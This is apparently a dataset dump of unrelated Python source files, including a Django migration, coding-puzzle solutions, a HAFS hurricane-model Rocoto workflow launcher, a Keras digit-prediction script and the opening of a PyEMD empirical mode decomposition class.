text stringlengths 38 1.54M |
|---|
# YOUR CODE HERE
length = len(message)
index = 0
encoded = ''
while index < length:
letter = ord(message[index])
encLetter = letter + key
newLetter = chr(encLetter)
encoded = encoded + newLetter
index = index + 1 |
# Generated by Django 2.0.4 on 2018-04-28 19:33
from django.db import migrations, models


class Migration(migrations.Migration):
    """Add `Club.photo` (with a placeholder default image) and change
    `Club.website` to a 200-character CharField."""

    dependencies = [
        ('page', '0012_merge_20180427_1450'),
    ]

    operations = [
        migrations.AddField(
            model_name='club',
            name='photo',
            field=models.ImageField(default='static/images/300x100',
                                    upload_to='static/images'),
        ),
        migrations.AlterField(
            model_name='club',
            name='website',
            field=models.CharField(max_length=200),
        ),
    ]
|
# Google Code Jam: recover which digits' English names were scrambled
# together into each input line.
# Ported to Python 3 (the original used raw_input/xrange and the Python 2
# print statement, so it could not run on Python 3); the leftover-letter
# debug prints that polluted stdout were removed.  The unused `math`
# import was dropped.
import sys


def decode_digits(scrambled):
    """Return the ascending string of digits whose English names' letters
    make up `scrambled`.

    Greedy elimination in a fixed order in which each name has a letter
    unique among the names still remaining (W->TWO, X->SIX, S->SEVEN,
    V->FIVE, U->FOUR, G->EIGHT, Z->ZERO, O->ONE, N->NINE, T->THREE),
    so the count of each name is fully determined at its step.
    """
    counts = {}
    for ch in scrambled:
        counts[ch] = counts.get(ch, 0) + 1
    names = ["TWO", "SIX", "SEVEN", "FIVE", "FOUR",
             "EIGHT", "ZERO", "ONE", "NINE", "THREE"]
    digits = [2, 6, 7, 5, 4, 8, 0, 1, 9, 3]
    found = []
    for name, digit in zip(names, digits):
        # How many whole copies of `name` fit in the remaining letters?
        # (name.count handles repeated letters, e.g. the two Es in SEVEN.)
        copies = min(counts.get(ch, 0) // name.count(ch) for ch in set(name))
        if copies:
            for ch in name:
                counts[ch] -= copies
            found.extend([str(digit)] * copies)
    found.sort()
    return ''.join(found)


def main():
    """Read the case count, then one scrambled line per case."""
    total = int(sys.stdin.readline())
    for case in range(1, total + 1):
        scrambled = sys.stdin.readline().strip()
        print("Case #{}: {}".format(case, decode_digits(scrambled)))


if __name__ == '__main__':
    main()
|
# https://leetcode.com/problems/verifying-an-alien-dictionary/
# 2020/10
# 32 ms
class Solution:
    """Check whether `words` are lexicographically sorted with respect to a
    permuted (alien) alphabet `order`."""

    def compare(self, w1, w2, order):
        """Return <0 / 0 / >0 if w1 sorts before / same as / after w2.

        BUGFIX context: the original annotated isAlienSorted with
        `List[str]` without importing typing, which raises NameError when
        the class body is executed; the annotation now uses the builtin
        generic `list[str]` (Python 3.9+).
        """
        for c1, c2 in zip(w1, w2):
            diff = order.find(c1) - order.find(c2)
            if diff != 0:
                return diff
        # Shared prefix: the shorter word sorts first.
        return len(w1) - len(w2)

    def isAlienSorted(self, words: list[str], order: str) -> bool:
        """True iff every adjacent pair is in non-decreasing alien order."""
        return all(
            self.compare(words[i], words[i + 1], order) <= 0
            for i in range(len(words) - 1)
        )
|
#! /usr/bin/env python3
##@namespace run_hafs
# @brief A wrapper around the Rocoto workflow system that knows how to run HAFS in Rocoto
#
# @anchor run_hafs_main
# This is a Python program, run_hafs.py, that users run to launch and maintain an
# HAFS workflow
#
# @code{.sh}
# run_hafs.py [options] [ensids and cycles] 95E case_root [conf]
# @endcode
#
# Arguments:
# * 95E --- stormid
# * case_root --- HISTORY for retrospective runs or FORECAST for real-time
#
# Options:
# * -f --- Force a run even if the *.xml and *.db file already exist
# * -w workflow.xml --- specify the Rocoto XML file
# * -d workflow.db --- specify the Rocoto database file
# * -s site-file.ent --- Specify the site file in the sites/ subdirectory
#
# Cycles:
# * 2014081412 --- one cycle to run
# * 2014081400-2014081618 --- a range of cycles to run
# * 2014 --- run all cycles for this storm in this year
# * -t --- include cycles even if they are not in the tcvitals
# * -n --- disable renumbering of invests into non-invests
# * -W N --- discard invests weaker than N m/s before renumbering
#
# Conf options:
# * ../parm/hafs_more.conf --- read this configuration file
# * config.run_gsi=yes --- specify the value of one configuration option
##@cond RUN_HAFS_PY
import os, sys, re, logging, collections, io, getopt, itertools
from os.path import realpath, normpath, dirname
def ask(question):
    """Prompt on stdout and read answers from stdin until 'y' or 'n' is given.

    Returns True for 'y', False for 'n'.  Exits with status 2 after 100
    unusable responses (also covers a closed/empty stdin).
    """
    sys.stdout.write(question)
    attempts = 0
    max_attempts = 100
    while True:
        attempts += 1
        answer = sys.stdin.readline()
        if answer.lower() == 'y\n':
            return True
        if answer.lower() == 'n\n':
            return False
        if attempts >= max_attempts:
            sys.stderr.write('Giving up after %d failed responses.' % attempts)
            sys.exit(2)
        sys.stdout.write('Please answer y or n.')
def usage(message=None,logger=None):
"""!Dumps a usage message and exits with status 2.
@param message An extra message to send to stderr after the usage message
@param logger Ignored."""
# The entire usage text goes to stderr so stdout stays clean for tooling.
print('''
Usage: run_hafs.py [options] [cycles] 95E case_root [conf]
Mandatory arguments:
95E -- the storm to run
case_root -- FORECAST = real-time mode, HISTORY = retrospective mod
Workflow options:
-f -- Tells the run_hafs.py that you already ran it once for this
storm, cycle list and experiment. It will use any existing
*.xml or *.db file without asking for permission. Critical
in crontabs.
-w workflow-file.xml -- use this as the output XML file to send
into rocotorun (rocotorun's -w option)
-d workflow-db.db -- use this as the SQLite3 database file for
Rocoto (rocotorun's -d option)
Specifying a site:
-s site-file -- path to a custom-made site file, rather than using
one automatically chosen from sites/*.ent. Do not include any
shell or XML metacharacters in the name.
PATHS:
This script should be run from the rocoto/ subdirectory of the HAFS
installation location so it can guess the ush/ and parm/ locations
(../ush and ../parm). You can override those guesses by providing
the paths in the $USHhafs and $PARMhafs environment variables.
SPECIFYING CYCLES:
-c N -- number of hours between cycles. This ONLY affects cycle
specifications after the -c option.
[cycles] -- one or more cycle specifications:
2014091312-2014091712 - run this range of cycles
2014091312 - run this cycle
2014 - all cycles from 0Z January 1, 2014 to
the end of that year.
2014091312-2014091712 2014091800 - run cycles from 2014091312
through 2014091712 AND run 2014091800
-t -- include cycles even if they are not in the tcvitals. This
option is turned on automatically when H214 cycle lists are
requested.
-n -- disable renumbering of invests to non-invests. This is done
automatically when an invest is requested.
-W N -- discard invests weaker than N meters per second before
renumbering. Default: -W 14 if a non-invest storm is
requested, and -W 0 (don't discard) if an invest is requested.
Configuration ([conf]):
section.option=value -- override conf options on the command line
/path/to/file.conf -- additional conf files to parse''', file=sys.stderr)
if message is not None:
print(str(message).rstrip()+'\n', file=sys.stderr)
# Always exit status 2 (usage error), whether or not a message was given.
sys.exit(2)
########################################################################
# Try to guess $USHhafs and $PARMhafs. The $HOMEhafs or current
# working directory are used if $USHhafs and $PARMhafs are not set in
# the environment. We also add the $USHhafs to the Python library
# path.
##@var USHhafs
# The ush/ subdirectory of the HAFS installation directory
USHhafs=None
##@var HOMEhafs
# The HAFS installation directory
HOMEhafs=None
##@var PARMhafs
# The parameter directory
PARMhafs=None
# Environment variables always win over guessing.
if os.environ.get('USHhafs',''): USHhafs=os.environ['USHhafs']
if os.environ.get('PARMhafs',''): PARMhafs=os.environ['PARMhafs']
if os.environ.get('HOMEhafs',''): HOMEhafs=os.environ['HOMEhafs']
if HOMEhafs is None and (USHhafs is None or PARMhafs is None):
# Assume we are running inside the rocoto/ subdirectory: the parent
# of the current working directory is then the installation root.
HOMEhafs=dirname(os.getcwd())
USHguess=os.path.join(HOMEhafs,'ush')
PARMguess=os.path.join(HOMEhafs,'parm')
# Only trust the guess when both directories actually exist.
if os.path.isdir(USHguess) and os.path.isdir(PARMguess):
if USHhafs is None: USHhafs=USHguess
if PARMhafs is None: PARMhafs=PARMguess
if HOMEhafs is not None:
if USHhafs is None: USHhafs=os.path.join(HOMEhafs,'ush')
if PARMhafs is None: PARMhafs=os.path.join(HOMEhafs,'parm')
# Abort (usage-style exit code 2) if any location is still unknown.
if USHhafs is None:
print("Cannot guess $USHhafs. Please set $HOMEhafs or " \
"$USHhafs in environment.", file=sys.stderr)
sys.exit(2)
if PARMhafs is None:
print("Cannot guess $PARMhafs. Please set $HOMEhafs or " \
"$PARMhafs in environment.", file=sys.stderr)
sys.exit(2)
if HOMEhafs is None:
print("Cannot guess $HOMEhafs. Please set $HOMEhafs " \
"in the environment.", file=sys.stderr)
sys.exit(2)
# Make the HAFS ush/ packages importable before the imports below.
sys.path.append(USHhafs)
########################################################################
# Load and set up the produtil package.
import hafs.launcher, hafs.prelaunch
import tcutil.revital, tcutil.numerics, tcutil.rocoto
from tcutil.numerics import to_datetime, to_timedelta
from tcutil.rocoto import entity_quote
import produtil.setup, produtil.atparse, produtil.run, produtil.prog, \
produtil.fileop, produtil.batchsystem, produtil.cluster
from produtil.fileop import remove_file, isnonempty
from produtil.run import run, exe, runstr
from produtil.prog import shbackslash
#######import hafs.launcher
#######import hafs_expt
# Name this job and initialize produtil logging/signal handling.
produtil.batchsystem.set_jobname('run_hafs')
produtil.setup.setup(send_dbn=False)
########################################################################
# Global variables and constants
logger=logging.getLogger('run_hafs')
epsilon = to_timedelta(5) # five seconds
six_hours = to_timedelta(6*3600)
# Default spacing between cycles; overridden by -c/--cycling.
cycling_interval = six_hours
# Requested cycles (YYYYMMDDHH strings) and ensemble member ids.
cycleset = set()
enset = set()
# Multi-storm storm-id and basin lists (-m / -M options).
mslist = list()
mblist = list()
benchmarkset = None
parse_tcvitals = True
renumber = True
force = False
site_file = ''
outxml = ''
outdb = ''
# Date-like positional arguments, kept for log messages.
dateargs = list()
# iarg/firstarg track where the storm id appears in the argument list.
iarg = 0
firstarg = 0
weak_invest = None
multistorm = False
# Option strings passed through to the workflow template.
storms_opt = ''
basins_opt = ''
renumber_opt = ''
def okpath(path):
"""!Return `path` fully normalized and expanded via
produtil.fileop.norm_expand_path (fullnorm=True)."""
return produtil.fileop.norm_expand_path(path,fullnorm=True)
########################################################################
# Parse the options and arguments.
short_opts = "c:d:fm:M:ns:tW:w:"
long_opts = ["cycling=",
             "database=",
             "force",
             "multistorms=",
             "multibasins=",
             "renumber=",
             "site=",
             "tcvitals",
             # BUGFIX: "weak" was declared without a trailing '=' although
             # its handler requires an argument (int(v) on the threshold);
             # --weak therefore crashed with ValueError on the empty string.
             "weak=",
             "workflow="
             ]
try:
    opts, args = getopt.getopt(sys.argv[1:], short_opts, long_opts)
except getopt.GetoptError as err:
    print(str(err))
    usage('SCRIPT IS ABORTING DUE TO UNRECOGNIZED ARGUMENT')
for k, v in opts:
    if k in ('-c', '--cycling'):
        # Hours between cycles; only affects cycle specs parsed after it.
        cycling_interval = to_timedelta(int(v)*3600)
    elif k in ('-d', '--database'):
        outdb = v
    elif k in ('-f', '--force'):
        force = True
    elif k in ('-m', '--multistorms'):
        mslist.extend(v.split(","))
        multistorm = True
        storms_opt = ''.join(['-m ', ','.join(mslist)])
    elif k in ('-M', '--multibasins'):
        mblist.extend(v.split(","))
        multistorm = True
        basins_opt = ''.join(['-M ', ','.join(mblist)])
    elif k in ('-n', '--renumber'):
        renumber = False
        renumber_opt = '-n'
    elif k in ('-s', '--site'):
        site_file = str(v)
    elif k in ('-t', '--tcvitals'):
        parse_tcvitals = False
    elif k in ('-W', '--weak'):
        weak_invest = int(v)
    elif k in ('-w', '--workflow'):
        outxml = v
    else:
        assert False, "UNHANDLED OPTION"
# Make sure the workflow isn't the database
if outxml[-3:] == '.db':
    usage('When using the -d option, the Rocoto XML filename must '
          'not end with ".db".')
# Make sure the database isn't the workflow
if outdb[-4:] == '.xml':
    usage('When using the -d option, the database filename must '
          'not end with ".xml".')
# Classify each positional argument by its textual shape.  Parsing stops
# at the first storm ID; the remaining arguments are handed to
# hafs.launcher below.
# NOTE(review): the '\A...\Z' patterns are non-raw strings; '\A', '\d',
# '\Z' survive only because CPython keeps unknown escapes -- prefer raw
# strings (e.g. r'\A\d\d\Z') to silence modern SyntaxWarnings.
for arg in args:
if re.match('\A\d\d\Z',arg):
logger.info('ensemble id')
# Single ensemble ID
enset.add('%02d'%int(arg,10))
elif re.match('\A\d\d-\d\d\Z',arg):
logger.info('list of ensemble ids')
# List of ensemble IDs
en1=int(arg[0:2],10)
en2=int(arg[3:],10)
enset.update([ "%02d"%(x+en1) for x in range(en2-en1+1) ])
elif re.match('\A\d{10}\Z',arg):
logger.info('single date/time')
# Single date/time
cycleset.add(arg)
dateargs.append(arg)
elif re.match('\A\d{4}\Z',arg):
logger.info('year')
# Year
start=to_datetime(arg+'01010000')
end=to_datetime(arg+'12312359')
now=start
# Walk the whole year in cycling_interval steps; epsilon avoids
# dropping the final cycle to floating/rounding of the end time.
while now<end+epsilon:
cycleset.add(now.strftime('%Y%m%d%H'))
now+=cycling_interval
dateargs.append(arg)
elif re.match('\A\d{10}-\d{10}\Z',arg):
logger.info('range of cycles')
# Range of date/times
start=to_datetime(arg[0:10])
end=to_datetime(arg[11:])
now=start
while now<end+epsilon:
cycleset.add(now.strftime('%Y%m%d%H'))
now+=cycling_interval
dateargs.append(start)
elif re.match('\A\d\d[A-Z]\Z',arg.upper()):
logger.info('storm id')
# Storm ID. This ends our argument parsing. We pass the
# remaining arguments on to parse_launch_args.
firstarg=iarg
if renumber:
# Invest (9xL) and test (8xL) storms never get renumbered.
if arg[0]=='9':
logger.info('Disabling renumbering for invest storm '+arg)
renumber=False
elif arg[0]=='8':
logger.info('Disabling renumbering for test storm '+arg)
renumber=False
break
elif re.match('\AH214:\d\d\d\d\Z',arg.upper()):
# H214 cycle requested
logger.info('H214 - use the H214 benchmark cycles')
parse_tcvitals=False
benchmarkset=arg.upper()
# else:
# usage('SCRIPT IS ABORTING DUE TO UNRECOGNIZED ARGUMENT "%s"'%(arg,))
iarg+=1
# A benchmark set defines its own cycles; explicit cycles conflict.
if benchmarkset and cycleset:
usage('SCRIPT IS ABORTING: YOU CANNOT SPECIFY CYCLES AND '
'USE A BENCHMARK SET')
# Ensemble "99" means the deterministic member: treat as no ensemble.
if enset==set(['99']):
enset=set()
# Now parse the rest of the arguments the same way as exhafs_launch:
print('firstarg',firstarg)
print('argsfirstarg..',args[firstarg:])
stid=args[firstarg]
case_root=args[firstarg+1]
logger.info('Running for storm '+stid.upper())
def fullify(s):
    """Make conf-file arguments absolute paths; pass section.option=value
    overrides through unchanged."""
    override = re.match('''(?x)(?P<section>[a-zA-Z][a-zA-Z0-9_]*)\.(?P<option>[^=]+)=(?P<value>.*)$''', s)
    if override:
        return s
    return os.path.abspath(s)
# Turn any conf files specified in arguments into fully-qualified
# paths. This is needed because run_hafs will generally be started
# from a different directory than the exhafs_launch.py.
if firstarg+2<len(args):
confargs=args[(firstarg+2):]
# Quote each conf argument so it survives XML entity expansion and
# the shell command line built later.
more_launch_vars=' '.join(
entity_quote(shbackslash(fullify(str(x))))
for x in confargs)
else:
confargs=list()
more_launch_vars=''
logger.info('MORE_LAUNCH_VARS='+repr(more_launch_vars))
# Tell the hafs.launcher to parse the remaining arguments so we can
# make the conf information:
# Generate the conf file and run the hafs.launcher's sanity checks
# that do not require a cycle:
# mslist does not contain the fakestorm id
logger.info('MSLIST: ' +repr(mslist))
if multistorm:
(case_root,parm,infiles,stids,stid,pstid,moreopts)=hafs.launcher.multistorm_parse_args(
mslist,args[firstarg:],logger,usage,PARMhafs=PARMhafs)
fakestid = stid
logger=logging.getLogger('run_hafs_'+str(fakestid))
# stids list includes all storm ids AND the fake storm id.
conf = hafs.launcher.launch(infiles,None,fakestid,moreopts[stids.index(pstid)],
case_root,init_dirs=False,
prelaunch=hafs.launcher.prelaunch,
fakestorm=True)
else:
(case_root,parm,infiles,stid,moreopt)=hafs.launcher.parse_launch_args(
args[firstarg:],logger,usage,PARMhafs=PARMhafs)
logger=logging.getLogger('run_hafs_'+str(stid))
# Choose a default weak-invest threshold when -W was not given:
# 0 (keep everything) for invests, 14 m/s otherwise.
if(weak_invest is None):
if(str(stid)[0]=='9'):
logger.info('Invest requested, and no -w given. Not discarding '
'weak Invests.')
weak_invest=0
else:
logger.info('Non-Invest requested, and no -w given. Will start '
'cycling off of last Invest <14m/s.')
weak_invest=14
# Note: this weak_invest default must match the value in
# relocate's Stage1.run function.
conf=hafs.launcher.launch(infiles,None,stid,moreopt,case_root,
init_dirs=False,prelaunch=hafs.launcher.prelaunch)
logger.info('Run sanity checks.')
try:
conf.timeless_sanity_check(enset,logger)
except Exception as e:
tcutil.rocoto.sanity_check_failed(logger,e)
logger.error("HAFS Sanity Checker Designation: INSANE!")
logger.error("Check your configuration for errors.")
logger.error("See earlier messages for clues.")
sys.exit(1)
logger.info("I think I'm sane.")
# Try to connect to the jlogfile:
loghere=conf.getloc('jlogfile','')
if not loghere:
# Fall back to the conventional scrub-area location when the conf
# file does not name a jlogfile explicitly.
try:
loghere=os.path.join(
conf.getloc('CDSCRUB'),conf.getstr('config','SUBEXPT'),
'log','jlogfile')
except KeyError as ke:
loghere=None
if loghere:
print('Sending jlogfile messages to %s'%(loghere,))
produtil.log.set_jlogfile(loghere)
########################################################################
# Parse the tcvitals
def check_test_vitals(vl):
"""!This is a replacement for tcutil.storminfo.name_number_okay for
use with TEST storms and internal stormids. It allows through
only the storm numbers matching stormnum, regardless of the
storm name (usually TEST and UNKNOWN would be dropped).
Generator: yields the matching vitals one at a time."""
# Relies on the module-level `stid` and `logger` set earlier in this
# script (this is a closure over script globals, not a pure function).
logger.info('Keeping only storm number %s in vitals'%(stid,))
for vital in vl:
if vital.stormid3.upper()==stid.upper():
yield vital
if parse_tcvitals:
logger.info('Getting list of tcvitals files.')
syndatdir=conf.getdir('syndat')
vitpattern=conf.getstr('config','vitpattern','syndat_tcvitals.%Y')
# One vitals file per distinct year touched by the requested cycles.
fileset=set()
for cycle in cycleset:
when=to_datetime(cycle)
vitfile=os.path.join(syndatdir,when.strftime(vitpattern))
fileset.add(vitfile)
revit=tcutil.revital.Revital(logger=logger)
logger.info('List of files to scan: '+(','.join(fileset)))
revit.readfiles(fileset,raise_all=False)
if renumber:
logger.info('Renumber invest cycles.')
if weak_invest is not None:
revit.renumber(threshold=int(weak_invest))
else:
revit.renumber()
elif stid[0]=='8':
logger.info('Fake stormid requested. Running limited clean-up.')
revit.clean_up_vitals(name_number_checker=check_test_vitals)
else:
logger.info('Not renumbering invest cycles. Will just clean.')
revit.clean_up_vitals()
# Collect the set of cycles that actually have vitals for the storm(s).
tcvset = set()
if mslist:
for ms_id in mslist:
tcvset.update([ vit.when.strftime('%Y%m%d%H') for vit in revit.each(ms_id) ])
else:
tcvset.update([ vit.when.strftime('%Y%m%d%H') for vit in revit.each(stid) ])
# Drop requested cycles with no vitals (except basin-scale multistorm).
notok = cycleset - tcvset
okset = cycleset - notok
if not multistorm or mslist:
cycleset=okset
listed=list(notok)
listed.sort()
logger.debug('NOTOK = '+( ','.join(listed) ))
listed=list(cycleset)
listed.sort()
if not listed:
# Nothing runnable: exit 0 so crontab invocations stay quiet.
produtil.log.jlogger.info(
'%s %s: no cycles to run. Exiting.'
%(str(stid),' ' + repr(dateargs)))
sys.exit(0)
else:
logger.info('I will ONLY run these cycles, since they have vitals:'
+(','.join(listed)))
########################################################################
# Create the list of variables to send to the ATParser
VARS = dict(os.environ)
if cycleset:
    VARS['CYCLE_LIST'] = tcutil.rocoto.cycles_as_entity(cycleset)
    for line in VARS['CYCLE_LIST'].splitlines():
        logger.info('Rocoto cycles: %s' % (line.rstrip(),))
    cyclelist = list(cycleset)
    cyclelist.sort()
    firstcycle = to_datetime(cyclelist[0])
    cycledesc = firstcycle.strftime('%Y%m%d%H')
else:
    # Benchmark-set mode: describe the cycles with an XML entity
    # reference (&<basin><number><year>;) defined by the site files.
    assert (isinstance(benchmarkset, str))
    year = int(benchmarkset[5:])
    # BUGFIX: the original read `sid`, which is never defined anywhere in
    # this script (NameError as soon as this branch ran); the storm id is
    # held in `stid`.
    number = stid[0:2]
    basin1 = stid[2].upper()
    # NOTE(review): tcutil.storminfo is not imported explicitly above --
    # it presumably becomes available via the tcutil.revital import;
    # confirm, or add an explicit import.
    (ibasin2, basin2, basin1, longinfo) = \
        tcutil.storminfo.expand_basin(basin1)
    cycledesc = '&%s%s%s;' % (basin2, number, year)
    VARS['CYCLE_LIST'] = cycledesc
if multistorm:
    VARS.update(MULTISTORM='YES',
                RENUM=renumber_opt,
                BASINS=basins_opt,
                MULTISTORM_SIDS=storms_opt,
                FAKE_SID=fakestid.upper())
else:
    VARS.update(MULTISTORM='NO')
try:
    stormlabel = conf.get('config', 'stormlabel', 'storm1')
except KeyError:
    stormlabel = 'storm1'
def yesno(b):
    """Map a truth value to the literal 'YES'/'NO' the XML template uses."""
    if b:
        return 'YES'
    return 'NO'
# Core template variables shared by both workflow flavors.
VARS.update(SID=stid.upper(), stormlabel=str(stormlabel),
WHERE_AM_I=conf.get('holdvars','WHERE_AM_I'),
WHICH_JET=conf.get('holdvars','WHICH_JET','none'),
MORE_LAUNCH_VARS=more_launch_vars,
CASE_ROOT=case_root,
SITE_FILE=site_file,
FETCH_INPUT=yesno(conf.get('config','input_catalog')=='hafsdata'),
)
# Copy the [rocotostr] and [rocotobool] conf sections into the template
# variables; booleans become the literal YES/NO Rocoto expects.
for (key,val) in conf.items('rocotostr'):
VARS[key]=str(val)
for (key,val) in conf.items('rocotobool'):
VARS[key]=yesno(conf.getbool('rocotobool',key))
if conf.getbool('config','run_ensda',False):
# Space-separated, zero-padded member ids: "001 002 ... NNN".
ens_size=conf.getint('config','ENS_SIZE',40)
assert(ens_size>=1)
ensids=' '.join([ '%03d'%(i+1) for i in range(ens_size) ])
VARS.update(ENS_SIZE='%d'%ens_size,ENSIDS=ensids)
else:
VARS.update(ENS_SIZE='000',ENSIDS='000')
# The ATParser substitutes strings only; fail fast on anything else.
bad=False
for k,v in VARS.items():
if not isinstance(v,str):
logger.error('%s: value is not a string. '
'It is type %s with value %s'%(
str(k),type(v).__name__,repr(v)))
bad=True
if bad: sys.exit(1)
########################################################################
# Order the ATParser to create the XML file.
rocotoxml = io.StringIO()
parser = produtil.atparse.ATParser(rocotoxml, varhash=VARS, logger=logger)
if multistorm:
    parser.parse_file('hafs_multistorm_workflow.xml.in')
else:
    parser.parse_file('hafs_workflow.xml.in')
# Default output names: hafs-<SUBEXPT>-<SID>-<cycledesc>.{xml,db}
outbase = 'hafs-%s-%s-%s' % (
    conf.get('config', 'SUBEXPT'),
    stid.upper(),
    cycledesc)
if not outxml: outxml = okpath(outbase + '.xml')
if not outdb: outdb = okpath(outbase + '.db')
havexml = isnonempty(outxml)
if havexml:
    # An existing XML is only overwritten with -f or user confirmation.
    if not force and \
       not ask('ALERT! %s: XML file exists. Overwrite (y/n)?' % (outxml,)):
        logger.error('%s: file exists, user does not want to overwrite.'
                     % (outxml,))
        sys.exit(1)
    else:
        logger.warning('%s: overwriting pre-existing XML file.' % (outxml,))
havedb = isnonempty(outdb)
deletedb = False
if havedb:
    if force or ask(
            'ALERT! %s: database for old configuration exists. Use it (y/n)?'
            % (outdb,)):
        logger.warning('%s: not deleting database for old configuration.'
                       % (outdb,))
    elif ask('%s: Delete database for old configuration (y/n)?' % (outdb,)):
        logger.warning('%s: deleting database for old configuration.'
                       % (outdb,))
        remove_file(outdb)
    else:
        # BUGFIX: the original logged a bare '%s' placeholder with no
        # argument, so the message showed a literal '%s'; supply the path.
        logger.error('%s: database exists, user does not want to delete '
                     'or use it. Aborting.' % (outdb,))
        sys.exit(2)
with open(outxml, 'wt') as outf:
    outf.write(rocotoxml.getvalue())
########################################################################
# Run rocotorun
clustername=produtil.cluster.name()
# WCOSS2 machines report their host names; normalize to one label.
if clustername in ('cactus','dogwood'):
WHERE_AM_I='wcoss2'
else:
WHERE_AM_I=clustername
# Source the HAFS job prolog, then hand the XML and DB to rocotorun.
cmd = exe('sh') [
'-c', '. %s/hafs_pre_job.sh.inc; which ruby ; which rocotorun ; rocotorun --verbose=5 -d %s -w %s'
%( shbackslash(USHhafs), shbackslash(outdb),
shbackslash(outxml) ) ] .env(QUIET_PRE_JOB='YES',
HOMEhafs=HOMEhafs,
WHERE_AM_I=WHERE_AM_I) \
< '/dev/null'
result=run(cmd,logger=logger)
if result:
sys.exit(result)
# NOTE(review): the critical() call below can never execute after
# sys.exit(result) -- presumably it was meant to run before the exit,
# inside the failure branch; confirm against upstream run_hafs.py.
# Also `produtil.jlogger` looks like it should be
# `produtil.log.jlogger`; verify against the produtil API.
produtil.jlogger.critical('rocotorun failed')
produtil.log.postmsg('Successfully ran rocotorun for %s.'%(outbase,))
# Keep a backup of the Rocoto database for post-mortem debugging.
bakdb=outdb+'.bak'
logger.info('Making a backup copy of .db file here: %s'%(bakdb,))
produtil.fileop.deliver_file(outdb,bakdb)
logger.info('Success. Rejoice: hurrah!')
##@endcond
|
from keras.models import model_from_json
import pandas as pd

# Load the model architecture from JSON, then its trained weights.
# BUGFIX/idiom: the JSON file is now opened in a `with` block so the
# handle is closed even if reading fails (the original open/close pair
# leaked the handle on error).
with open('cnn_model.json', 'r') as json_file:
    loaded_model_json = json_file.read()
loaded_model = model_from_json(loaded_model_json)
# load weights into new model
loaded_model.load_weights("cnn_model.h5")
print("Loaded model from disk")
# NOTE(review): hard-coded absolute path -- consider a CLI argument.
x_test = pd.read_csv('/Users/karan/Documents/karan/karan_Project/test.csv')
# (The original's `x_test.iloc[:, :]` was a no-op copy and was removed.)
# Reshape flat 784-pixel rows to (N, 1, 28, 28) and scale to [0, 1].
x_test = x_test.values
x_test = x_test.reshape(x_test.shape[0], 1, 28, 28).astype('float32')
x_test /= 255
# NOTE(review): predict_classes was removed in recent Keras/TF releases;
# if upgrading, replace with predict(...).argmax(axis=-1).
predictions = loaded_model.predict_classes(x_test, batch_size=128, verbose=1)
df = pd.DataFrame(predictions)
df.to_csv("predictions_cnn.csv")
print('Saved the predictions!')
|
#!/usr/bin/python
# coding: UTF-8
#
# Author: Dawid Laszuk
# Contact: laszukdawid@gmail.com
#
# Edited: 11/05/2017
#
# Feel free to contact for any information.
from __future__ import division, print_function
import logging
import numpy as np
import os
from scipy.interpolate import interp1d
from PyEMD.splines import *
class EMD:
"""
Empirical Mode Decomposition
*Note:*
Default and recommended package for EMD is EMD.py.
Advantage of this is that it utilises Kahan summation algorithm,
which reduces numerical error when subtracting numerically.
Method of decomposing signal into Intrinsic Mode Functions (IMFs)
based on algorithm presented in Huang et al. [1].
Algorithm was validated with Rilling et al. [2] Matlab's version from 3.2007.
[1] N. E. Huang et al., "The empirical mode decomposition and the
Hilbert spectrum for non-linear and non stationary time series
analysis", Proc. Royal Soc. London A, Vol. 454, pp. 903-995, 1998
[2] G. Rilling, P. Flandrin and P. Goncalves, "On Empirical Mode
Decomposition and its algorithms", IEEE-EURASIP Workshop on
Nonlinear Signal and Image Processing NSIP-03, Grado (I), June 2003
"""
logger = logging.getLogger(__name__)
def __init__(self):
# Declare constants
# Sifting stop-criterion thresholds (std-dev, scaled variance, power
# and range tests).
self.stdThreshold = 0.2
self.scaledVarThreshold = 0.001
self.powerThreshold = -5
self.totalPowerThreshold = 0.01
self.rangeThreshold = 0.001
# Number of extrema mirrored over each signal boundary.
self.nbsym = 2
self.reduceScale = 1.
self.scaleFactor = 100.
# Plotting / interactivity switches (off by default).
self.PLOT = 0
self.INTERACTIVE = 0
self.plotPath = 'splineTest'
# Envelope spline type and extrema detector ('simple' or 'parabol').
self.splineKind = 'akima'
self.extrema_detection = 'simple' # simple, parabol
# dtype every intermediate array is expected to carry.
self.DTYPE = np.float64
# FIXE / FIXE_H force a fixed number of sifting iterations when nonzero.
self.FIXE = 0
self.FIXE_H = 0
self.MAX_ITERATION = 1000
if self.PLOT:
# NOTE(review): `plt` is bound locally here and never used in this
# method; plotting code elsewhere presumably imports pylab itself.
import pylab as plt
def extract_max_min_spline(self, T, S):
"""
Build the upper and lower envelopes of S by splining its maxima
and minima (with boundary mirroring).
Input:
-----------------
T - Time array.
S - Signal.
Output:
-----------------
maxSpline - Spline which connects maxima of S.
minSpline - Spline which connects minima of S.
Also returns the (position, value) extrema arrays used, or the
sentinel [-1, -1, -1, -1] when fewer than 3 extrema exist.
"""
# Get indexes of extrema
maxPos, maxVal, minPos, minVal, indzer = self.find_extrema(T, S)
# dtype checks are diagnostics only; execution continues regardless.
if maxPos.dtype!=self.DTYPE: self.logger.error('maxPos.dtype: '+str(maxPos.dtype))
if maxVal.dtype!=self.DTYPE: self.logger.error('maxVal.dtype: '+str(maxVal.dtype))
if minPos.dtype!=self.DTYPE: self.logger.error('minPos.dtype: '+str(minPos.dtype))
if minVal.dtype!=self.DTYPE: self.logger.error('minVal.dtype: '+str(minVal.dtype))
# Too few extrema to build envelopes: sentinel return of four -1s.
if len(maxPos) + len(minPos) < 3: return [-1]*4
#########################################
# Extrapolation of signal (over boundaries)
maxExtrema, minExtrema = self.prepare_points(T, S, maxPos, maxVal, minPos, minVal)
maxTSpline, maxSpline = self.spline_points(T, maxExtrema)
minTSpline, minSpline = self.spline_points(T, minExtrema)
if maxExtrema.dtype!=self.DTYPE: self.logger.error('maxExtrema.dtype: '+str(maxExtrema.dtype))
if maxSpline.dtype!=self.DTYPE: self.logger.error('maxSpline.dtype: '+str(maxSpline.dtype))
if maxTSpline.dtype!=self.DTYPE: self.logger.error('maxTSline.dtype: '+str(maxTSpline.dtype))
return maxSpline, minSpline, maxExtrema, minExtrema
def prepare_points(self, T, S, maxPos, maxVal, minPos, minVal):
if self.extrema_detection=="parabol":
return self._prepare_points_parabol(T, S, maxPos, maxVal, minPos, minVal)
elif self.extrema_detection=="simple":
return self._prepare_points_simple(T, S, maxPos, maxVal, minPos, minVal)
else:
msg = "Incorrect extrema detection type. Please try: "
msg+= "'simple' or 'parabol'."
raise ValueError(msg)
def _prepare_points_parabol(self, T, S, maxPos, maxVal, minPos, minVal):
"""
Mirror up to nbsym extrema over each signal boundary so the
